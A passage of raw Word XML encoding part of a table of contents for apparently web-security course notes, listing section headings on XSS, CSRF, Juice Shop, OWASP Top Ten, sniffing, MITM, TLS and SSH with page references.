                <w:webHidden/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4935893C" w14:textId="7AD623CE" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782546" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS DOM – High Level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782546 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>62</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25DE9572" w14:textId="7BAB6B5C" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782547" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS Stored &amp; Reflected (4.1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782547 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6717F74D" w14:textId="4B6EA0E9" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782548" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS Stored &amp; Reflected – Low Level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782548 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D772A5A" w14:textId="4DD642BC" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782549" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS Stored &amp; Reflected – Medium Level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782549 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>66</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7FA08F51" w14:textId="23EA3EB9" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782550" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS Stored &amp; Reflected – High Level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782550 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>67</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4DA70159" w14:textId="26D9E1FC" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782551" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782551 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>67</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1AEB94F7" w14:textId="3304835A" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782552" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CSRF (4.1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782552 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5ABE9534" w14:textId="5A9756A1" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782553" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CSRF – Low Level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782553 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C6EE50C" w14:textId="0A316259" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782554" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CSRF – Medium Level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782554 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>70</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2555F28D" w14:textId="251DFF6F" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782555" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Juice Shop</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782555 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D46C1FE" w14:textId="3979468A" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782556" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OWASP Top Ten</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782556 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E8D2502" w14:textId="1D022491" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782557" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Self-Study</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782557 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>76</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17D1A1C2" w14:textId="041AE5FE" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782558" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Protocols and Servers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782558 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>76</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="603755C2" w14:textId="56A07CE2" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782559" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sniffing Attack</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782559 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>76</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45E1DBDA" w14:textId="51E85BDB" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782560" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Man in the Middle Attack (MITM)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782560 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>76</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04BC1503" w14:textId="7DFFF89F" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782561" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Transport Layer Security (TLS)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782561 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>77</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E7ECD43" w14:textId="46AB7361" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782562" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Secure Shell (SSH)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782562 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
